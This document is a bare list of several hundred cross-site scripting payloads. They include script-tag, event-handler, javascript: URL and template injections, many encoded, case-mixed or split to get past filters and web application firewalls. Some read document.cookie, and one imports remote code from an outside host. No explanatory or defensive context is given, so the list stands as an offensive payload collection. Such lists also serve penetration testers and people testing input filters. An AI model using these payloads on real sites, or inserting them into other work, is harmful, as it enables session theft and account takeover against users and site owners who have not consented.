")%27--><SvG/onLoaD=(co&#110;firm)(1)--!>"
alert(document.cookie)
'"><AHRef=\"AutoFocusOnFocus​=top/**/?.document+cookie>
'); alert('Humal')
\\";alert('Humal');//
*/alert('HUMAL\n-HUMAL'); //
'); alert('Humal'); var x='
\\'); alert(\'Humal\');var x=\'
';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;
<img src='1' onerror/=alert(0) />
<object onafterscriptexecute=confirm(0)>
';alert(String.fromCharCode(88,83,83))//';
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
alert(String.fromCodePoint(88,83,83))
//”;alert(String.fromCharCode(88,83,83))
‘;alert(String.fromCharCode(88,83,83))//
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//&#45;&#45;></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
xyz';"/></textarea><Img Src=OnXSS OnError=prompt(document.cookie)>
<img/src='1'/onerror=alert(0)>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<svgonload=alert(1)>
"><svg/onload=confirm(1)>"@x.y
+330011223344;phone-context=<script>alert(0)</script>
document.location='java\rscript:alert(1)'
eval('ale'+'rt(0)');
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
<img/src/onerror=alert(`Xss_so`)>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<svg onload=alert%26%230000000040"")>
%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E
;1'"><!--><K Data-Spy=scroll Data-Target=&lt;Svg/OnLoad&equals;confirm?.(1)%26gt;%3E
;1/47/42/55/55/41/76/74Img/40Src/40OnError/75confirm/140/113/140/76
")%27--><sVG/onload=(co&#110;firm)(1)<!--"
#<img/src/onerror=alert(`Xss_so`)>
#'-alert(1)-'
#\"-alert(1)}//
>"'><script>alert(2);</script>
#*/alert(1)
'}alert(1);{'
({‘ \’(){alert(1)}})[` \`]()
>'"><script>alert(2);</script>
+alert(1)+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
>'><script>alert(2);</script>
>'"><img src=x onerror=script(2);>
& lt;script&gt;alert(2);& lt;/script&gt;
& apos;><script>alert(2);</script>
!');script(2);//
$("script(2)")
[[constructor.constructor('alert(document.cookie)')()]]
['script'](2)
123')});alert(1);(()=>{('
&#x27;&lt;script&gt;alert(1)&lt;/script&gt;&#x27;
&#x27;javascript:alert(2)&#x27;
#x27;&lt;img src=1 onerror=alert(1)&gt;&#x27;
&#x27;&quot;&lt;img src=1 onerror=alert(1)&gt;&quot;&#x27;
&#x27;&quot;&gt;&lt;img src=x onerror=prompt(document['domain']);&gt;&#x27;
" /> <script>alert('XSS Testing");</script> 
');alert(1)//
" accesskey='x' onclick='confirm`1`' //
<x/oncopy=alert()>x
a=8,b=confirm,c=window,c.onerror=b;throw-a
<?tag x="-->" test="<img src=x onerror=alert(1)//">
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
new Function`a\l\ert\`1\``
?url=%26%2302java%26%23115cript:alert(document.domain)
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
</script><script>confirm(document.cookie)</script>
<sCriPt>confirm(documen.cookie)</ScRipt>
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
')}, 1000);alert("xss");//
1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>
1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>
<body onload="window.alert('XSS_WAF_BYPASS')">
<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>
"><img src=x onerror=prompt(document['domain']);>.asp
"><img src=x onerror=prompt(document['domain']);>.aspx
"><img src=x onerror=prompt(document['domain']);>.php
"><img src=x onerror=prompt(document['domain']);>.html
"><img src=x onerror=prompt(document['domain']);>.htm
"><svg onload=prompt(document.domain);>.asp
"><svg onload=prompt(document.domain);>.aspx
"><svg onload=prompt(document.domain);>.php
"><svg onload=prompt(document.domain);>.html
<!--><svg onload=alert(1)-->.asp
<!--><svg onload=alert(1)-->.aspx
<!--><svg onload=alert(1)-->.php
<!--><svg onload=alert(1)-->.html
"><img src=x onerror=prompt('document.domain');>.asp
"><img src=x onerror=prompt('document.domain');>.aspx
"><img src=x onerror=prompt('document.domain');>.php
"><img src=x onerror=prompt('document.domain');>.html
"><img src=x onerror=prompt('document.domain');>.htm
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.php
<script>alert(1)</script>.html
<script>alert(1)</script>.htm
<ScRiPt>alert(1)</ScRiPt>
<s%00c%00r%00i%00p%00t>alert(1)</script>
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
<img src="x" onerror="alert(1)">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
%3cscript%3ealert(1)%3c/script%3e
&#60;svg/onload=alert(1)&#62;
&#60;script&#62;alert(1)&#60;/script&#62;
--><svg onload=alert(1)>
aaaaa\”-confirm`1`//
\”-confirm`1`//
%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E
";}(document.writeln(decodeURI(location.hash))-"#<iframe src=javascript:alert(document.domain)
javascript://%250Aalert(1)
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
eval('alert(1)');
javascript:window/*Ata*/[%27loc%27%2b%27ati%27%2b%27on%27]%3d%27java%27%2b%27scr%27%2b%27ipt:%27%2blocation/*#*/;alert(origin)
\u0061\u006c\u0065\u0072\u0074(1)
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
'"><script>alert(2);</script>
"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])//
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
%3E'><script>alert(2);</script>
%22-[9].every(alert)-%22//
%22%3E'><script>alert(2);</script>
%E2%80%9C%3E%3CSvG%2Fonload%3Dalert%28document.domain%29%3E
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
%27%3E'><script>alert(2);</script>
%22%27%3E'><script>alert(2);</script>
'>  <script>alert(2);</script>
'>'><SCript>alert(2);</script>
"/><script>alert(1337);</script>
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E
'>👽💻🔥<script>alert(2);</script>
'>'+'><script>alert(2);</script>
&#62;'&gt;"<script>alert(2);</script>
'&#x3E;'>"><script>alert(2);</script>
<img src=x onerror=alert('from\u0020subcat\u0020title')>
"><img src=a onerror=alert(document.location)>
"><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)​>
"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
'\u003E'\u0022><script>alert(2);</script>
'>'\n><script>alert(2);</script>
'&#x3E;'><script>alert(2);</script>
'>&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--
'><!--"/><style>@import 'data:text/css;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKSk=';</style><b><!--
'>&lt;/b&gt;%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb&gt;&lt;!--
'\u003e\'</b><script>alert(document.cookie)</script><b><!--'
'+ '</b><script>alert(document.cookie)</script><b><!--'
(function(){alert(document.cookie)})();
')})();alert(document.cookie);({}'
'><!--</b><script>alert(document.cookie)</script><b><!--'
"alert(document.cookie)['script'](2);"
'});alert(document.cookie);//'
'&lt;/b&gt;<script>alert(document.cookie)</script><b&gt;<!--
'><scr'+'ipt>alert(document.cookie)</scr'+'ipt><b><!--
');alert(document.cookie)();//
'> </b> <script> alert(document.cookie) </script> <b> <!--
' style="display:none"><script>alert(document.cookie)</script><b><!--
' + String.fromCharCode(41) + 'alert(document.cookie)' + String.fromCharCode(40) + '//
'><b title="</b><script>alert(document.cookie)</script><b"><!--
`${String.fromCharCode(60)}/b${String.fromCharCode(62)}<script>alert(document.cookie)</script>${String.fromCharCode(60)}b${String.fromCharCode(62)}<!--`
'&#x29;&#x28;};alert(document.cookie);--&#x22; &lt;'
"><img src=x onerror=alert`1`;
"><img src=x onerror=alert('1');
`"><img src=x onerror=alert`1`;
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1);%3E
'>&#40;&#41;<script>alert(document.cookie)</script><b><!--'
'&lt;/b&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;b&gt;&lt;!--'
')};alert(document.cookie);//"
')};alert(document.cookie);--" /*'
'> <!-- </b> <script> alert(document.cookie) </script> <b> <!--'
"><img src=x onerror=alert('1");
"><img src=x onerror=alert&lsqb;1];
"><img src=x onfocus=alert(1);>
'<!--\x29\x28;}alert(document.cookie);//"-->'
' title="</b><script>alert(document.cookie)</script><b><!--">'
'%27%3E%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cb%3E%3C%21--'
'\u0029\u0028};alert(document.cookie);//"
"><svg/onload=alert(1);>
"><iframe onload=alert(1);>
"><audio onplay=alert(1);>
"><img src="javascript:alert(1);" />
%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E
"><img src=x onerror=alert 1;
"><img src=x onerror=prompt(document.domain);<<
"><img src=x onerror=prompt(document['domain']);>
"><img src=x onerror=this.innerHTML=''><script>alert(document.domain)</script>">
"><img src=x onerror=eval('prompt(document.domain)')>
"><img src=x onerror=Function('prompt(document.domain)')()
"><img src=x id="img"> <script>document.getElementById('img').addEventListener('error', function(){prompt(document.domain);})</script>
"><img src=x onerror=prompt(document.domain);>
"><img src=x><img src= onerror=prompt(document.domain);>
PHNjcmlwdD5pbWcgc3JjPXggb25lcnJvci5wcm9tb3RlKHRy
&quot;&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
&lt;&lt;img src=x onerror=prompt(document)&gt;&gt;;
"><img\ src=x\ onerror=prompt(document.domain);>
"><img src=x onerror="prompt(document.domain);">
"><img src=x onerror=prompt(document&#46;domain);>
"><img src=x onerror=prompt(document%2Edomain);>
"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" onerror=prompt(document.domain);>
"><img src=x onerror=prompt(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110));>
"><img src=x onerror=prompt(unescape('document%2Edomain'));>
"><svg onload=prompt(document.domain);>
"><img src=x onerror=prompt(document.domain); title=x>
"><div style="background-image: url(x)" onerror=prompt(document.domain);>
"><script>var img=document.createElement('img');img.src='x';img.onerror=function(){prompt(document.domain);};document.body.appendChild(img);</script>
"><div style="background-image: url('x');" onerror=prompt(document.domain);>
<scr'+'ipt>alert(1)</scr'+'ipt>
\<script\>alert(1)\<\/script\>
<script>alert\u00281\u0029</script>
%3Cscript%3Ealert(1)%3C/script%3E
"><IMG SRC=x ONERROR=prompt(document.domain);>
"><div src=x onerror=prompt(document.domain);>
"><img src=data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw== onerror=prompt(document.domain);>
"><div style="background-image: url(x);" onerror=prompt(document.domain);>
"><img src=/x onerror=prompt(document.domain);>
"><img src="x" onerror="prompt(document.domain);">
"><img src='x' onerror='prompt(document.domain);'>
"><img src=x onerror=(prompt(document.domain));>
"><img src=x   onerror=prompt(document.domain);>
"><img src=x&#9;onerror=prompt(document.domain);>
"><img src=x onerror=prompt('document.domain');>
"><img src=x id=img> <script>document.getElementById('img').addEventListener('error',function(){prompt(document.domain);})</script>
"><img src=x style=content:'x' onerror=prompt(document.domain);>
"><img src=data:, onerror=prompt(document.domain);>
"><img src=x alt=x onerror=prompt(document.domain);>
%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E
"><img src=x ONERROR=prompt(document.domain);>
"><img src=x onmouseover=prompt(\u0064ocument.domain);>
"><link rel="stylesheet" href="style.css"><img src=x onerror=prompt(document.domain);>
"><svg><img src=x onerror=prompt(document.domain);></svg>
'--><img src=x onerror=prompt(document.domain);><!--
"><img/src/onerror=alert(`Xss_so`)>
"<div style="background-image: url(x)" onerror=prompt(document.domain);>
\"><img src=x onerror=prompt(document.domain);>
"><img src:x onerror=prompt(document.domain);>
"><img src=x\%28\%29\ onerror=prompt(document.domain);>
">&lt;img src=x onerror=prompt(document.domain);&gt;
"%3E<img src=x onerror=prompt(document.domain);%3E"
"><img src=x onerror=prompt(document.domain);String.fromCharCode(62);">
">\<img src=x onerror=prompt(document.domain);\>\;\>\<\>"
%0d%0a%0d%0a<script>alert(document.domain)</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
javascript:alert(1);/////
"><img src=x onerror='alert(document.domain)'>
'"/><img src= x onerror='alert(document.domain)'>
'"/><img src= x onerror=prompt(/xss/)>
<img src='test' onmouseover='alert(2)'>
/><script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script>
</style></script><script>alert("XSS")</script>
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
<ScRipt>ALeRt("hi");</sCRipT>
"};alert(23);a={"a":
#<><img src=1 onerror=alert(1)>
"></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCdYU1MgUE9DIGJ5IERFREknKTwvc2NyaXB0PiJ9
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
q="><img/src/onerror=.1|alert`` class=d>
search?q=javascript:alert(document.domain)
#javascript:alert(document.domain)
<><img src=1 onerror=alert(1)>
<img src=1 onerror=print()>
%27x%27onclick=%27alert(1)
"><sVg%2fonload%3dalert%2ebind%28%29%281%29%20class%3dRahul-Dh>
“><img only src=1 onerror=alert()>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<Img Src=OnXSS OnError=prompt(document.cookie)>
</script><svg/pnload=prompt(1)>
<sCript>confirm()</sCript>
"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)>
<img src=x onerror=prompt()>
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->
javascript:var{a:onerror}={a:alert};throw%20document.domain
java%0d%0ascript%0d%0a:alert(document.domain);//
&lt;img src=x onerror=alert()>
#\'-alert(1)//
-alert(1)-&apos;
' onerror='alert("xss")'>
<img src="invalid-image" onerror="alert('XSS');">
#<img src="invalid-image" onerror="alert('XSS');">
<img src=x onerror="prompt(1)">aaaaaaaaaaaa
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa
</script><svg/onload=alert(0)>
"><body/oNpagEshoW=(confirm)(document.domain)>
"<IMG DYNSRC=\"javascript:alert('XSS');\">"
secbreake@gmail.com\u003C/script\u003E\u003Cscript\u003Ealert(document.domain)//
test<i>test</i><a onmouseover="alert(document.cookie)">
//j\\javascript:alert(document.domain)
<p><img/src/onerror=alert(`Xss_so`)></p>
('+'alert(1)+')();
.alert(1);
'></script><svg/onload=alert(document.cookie)>
//j%5c%5cjavascript%3aalert(document.domain)
javascript:(alert('XSS Success!'))()
#javascript:(alert('XSS Success!'))()
#"><svg onload=alert(1)>
%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E
嘼img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
嘼"><svg onload=prompt(document.domain);>
嘍嘊嘍嘊嘍嘊嘼script嘾alert(1);嘼/script嘾
"><u>XSS</u><marquee+onstart='alert(document.cookie)'>XSS
{{window['eval'](window['atob'](window['decodeURIComponent']('Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy')))}}
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY3VtZW50LmNvb2tpZSk7PjEy
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
///%01javascript:alert(document.cookie)/
javascript:alert(document.domain);
xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>
0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;
</b><script>alert(document.cookie)</script><b><!--
</title><script>alert(document.domain)</script>
ryp3i"accesskey="x"onclick="alert(1)"//opk15
#<ScRiPt>alert(1)</ScRiPt>#
"'><svg/onload=confirm(666)>
#"'><svg/onload=confirm(666)>
'x'%20onclick='confirm`1`'
'confirm(document.domain)'>
#'confirm(document.domain)'>
#</script><script>alert(1)</script>
;</script><embed/test='asdf'/sr%00c='/'>
${alert(1)}
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
https://me6.com/aem/xss2.svg
<Img Src=OnXSS OnError=confirm(1)>
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
"/>"/><img src=xss onerror=alert(2)>
/><svg src=x onload=confirm(document.domain);>
</h1><script>alert(1)</script><h1>
</script><body/onload=alert(m3ez)>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
"onmouseover="alert(document.cookie)"><!--
<script>alert(1234)</script>
<script>prompt(1234)</script>
#/<script>alert(1234)</script>
<IMG+LOWSRC="javascript:alert(1);">
<meta style="xss:expression(open(alert(1)))" />
<img+<iframe ="1" onerror="alert(1)">
<base+href="javascript:alert(1);//">
<bgsound+src="javascript:alert(1);">
<object+data="javascript:alert(0)">
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>1
%3E%3Cbody%20onload=javascript:alert(1)%3E
'">><marquee><h1>1</h1></marquee>
</br style=a:expression(alert(1))>
<font style='color:expression(alert(1))'>
<embed src="data:image/svg+xml;>
"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e
<object><param name="src" value="javascript:alert(0)"></param></object>
<isindex action=javascript:alert(1) type=image>
<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
'%26%26'javascript:alert%25281%2529//
<scr<script>ipt>prompt(document.cookie)</scr</script>ipt>
12&<script>alert(123)</script>=123
<img/src="xss.png"alt="xss">
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
foo%00<script>alert(document.cookie)</script>
x"><svg%0Donload="window['alert'](document.cookie)">
x'><svg%0Donload='window["alert"](document.cookie)'>
x"><svg%0Donload="window['alert'](document['cookie'])">
